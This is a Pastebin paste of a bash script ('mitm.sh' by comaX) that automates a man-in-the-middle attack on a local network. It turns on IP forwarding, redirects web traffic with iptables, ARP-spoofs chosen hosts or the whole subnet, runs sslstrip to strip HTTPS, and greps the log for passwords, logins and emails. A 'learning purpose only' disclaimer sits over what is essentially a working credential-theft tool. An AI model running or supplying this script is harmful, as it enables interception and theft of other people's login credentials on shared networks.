Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Little bash script to launch man it the middle attack and sslstrip.
- # version 0.6 by comaX
- PROGNAME=$(basename $0)
- VERSION="0.6.2"
- #Let's define some arguments that can be passed to the script :
- args=
- while [ $# -ge 1 ] #check parameters
- do
- case $1 in
- -h | --help) #define help message
- clear
- echo -e "You are running $0, version $VERSION.
- usage : $0 [-h | --help] | [-u | --upadte]
- -h or --help : displays this help message, disclaimer and exit.
- -u or --update updates and installs this script
- \033[31m DISCLAIMER :\033[m
- This program is intended for learning purpose only. I do not condone hacking
- and wouldn't be held responsible for you actions. Only you would face legal
- consequences if you used this script for illegal activities.
- \033[31m What I think should be learnt from this script :\033[m
- This script should teach you how easy it is to steal sensitive online
- credential and how to protect you from it, provided you understand
- what this program does. The best way to understand what it does is
- to look at its source. This will also teach you very basic shell script
- programming.
- \033[31m Changelog :\033[m
- added in v0.6
- -Support for multiple targets
- added in v0.5 :
- -Parameters for this great help message and update, more comments.
- -Minor improvments
- added in v0.4 :
- -User friendly case insensitive answers (Y/y)
- -Option to map network, retrieving live hosts and their dns names
- -Minor improvments
- \033[31m Credits :\033[m
- Credits goes to all people on backtrack forums for their help and support,
- and google for being my best friend with scripting.
- Please criticize this program or submit ideas on the official thread at
- http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
- exit ;;
- -u | --update) #update program
- echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
- read -e proceed
- if [[ $proceed = "y" || $proceed = "Y" ]] ; then
- wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
- cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
- rm /tmp/mitm_update.sh #delete temp file
- echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
- sleep 3
- chmod +x /usr/bin/mitm #make newly installed script executable
- /usr/bin/mitm #launch new script
- else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2
- fi ;;
- *) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;;
- esac
- shift
- done
- clear
- echo -e "===========================================================================
- =\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
- = Feel free to contribute, and distribute this script as you please. =
- = Official thread : http://tiny.cc/mitmautomate =
- = Check out the help (-h) to see new features and informations =
- = You are running version $VERSION. =
- ==========================================================================="
- echo
- echo
- # Starting fresh : reset ip forward and iptables
- echo -e "\033[31m [+] Cleaning iptables \033[m"
- echo "[-] Cleaned."
- echo "0" > /proc/sys/net/ipv4/ip_forward
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- # Defining exit function and other ending features
- cleanup() {
- echo
- echo "[+] Killing processes and resetting iptable."
- kill ${sslstripid}
- killall arpspoof
- echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
- iptables --flush # there are probably too many resets here,
- iptables --table nat --flush # but at least we're sure everything's clean
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo "[+] Clean up successful..."
- echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
- echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
- egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found
- echo
- echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
- echo "If you want to keep it, it will be stored in /root/$filename.txt"
- read -e keep
- if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
- mv /tmp/$filename.txt /root/$filename.txt #moving file
- if [ -f "/root/$filename.txt" ]; then #check if it exists
- echo "Log file copied !" #it does
- else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
- fi
- else rm /tmp/$filename.txt #removing temp file
- echo "All logs deleted"
- fi
- if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
- echo
- echo
- exit 1 #if yes, exit.
- else
- echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
- read -e install
- if [[ $install = "Y" || $install="y" ]] ; then
- cp ./mitm.sh /usr/bin/mitm #copy and rename script
- echo -e "\033[32m Script installed !\033[m"
- else echo "Script not installed."
- fi
- fi
- exit
- }
- ###############################End of functions#############################
- # IP forwarding
- echo
- echo -e "\033[31m [+] Activating ip forwarding... \033[m"
- echo "1" > /proc/sys/net/ipv4/ip_forward
- echo "[-] Activated."
- #Iptables
- echo
- echo -e "\033[31m [+] Configuring iptables... \033[m"
- echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
- echo
- read -e outport
- echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
- echo
- read -e inport
- echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
- iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
- echo "[-] Traffic rerouted"
- #Arpspoofing
- echo
- echo -e "\033[31m [+] Activating arpspoofing... \033[m"
- echo
- ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
- echo
- echo "Enter gateway ip adress (as shown above) :"
- read -e gateway
- echo
- echo "What interface would you like to use ? (it should match gateway ip as shown above)"
- read -e iface
- echo
- echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
- read -e choicearp
- echo
- if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
- echo
- echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]"
- read -e hosts
- echo -e "\033[31m "
- if [[ $hosts = "Y" || $hosts = "y" ]] ; then
- fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
- grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
- rm /tmp/hosts.txt # remove temporary file
- echo -e "\033[m " # switch color back to white
- else echo -e "\033[m "
- fi
- echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
- arpspoofi() {
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
- if [[ "$2" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- if [[ "$3" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- if [[ "$4" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- if [[ "$5" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- if [[ "$6" > "0" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
- else echo
- fi
- t1=$1
- t2=$2
- t3=$3
- t4=$4
- t5=$5
- t6=$6
- }
- echo "Enter ip adresses"
- read -e parameters
- arpspoofi $parameters
- echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
- echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
- elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
- xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$!
- sleep 2
- echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
- echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
- else echo "Your choice is invalid. Quitting."
- cleanup
- fi
- #Sslstrip
- echo
- echo -e "\033[31m [+] Activating sslstrip... \033[m"
- echo "Choose filename to output :"
- read -e filename
- sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
- sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
- echo
- echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
- echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ?
- echo
- echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
- echo
- echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
- echo
- read quitting
- if [ $quitting = "quit" ] ; then
- cleanup
- else echo "Bad choice. Enter quit to stop attack"
- read -e quitting
- if [ $quitting = "quit" ] ; then
- cleanup
- else echo "Bad choice. Enter quit to stop attack"
- read -e quitting
- if [ $quitting = "quit" ] ; then
- cleanup
- else echo "Bad choice. Enter quit to stop attack"
- read -e quitting
- if [ $quitting = "quit" ] ; then
- cleanup
- else echo "Bad choice. Enter quit to stop attack"
- echo
- echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
- cleanup
- fi
- fi
- fi
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement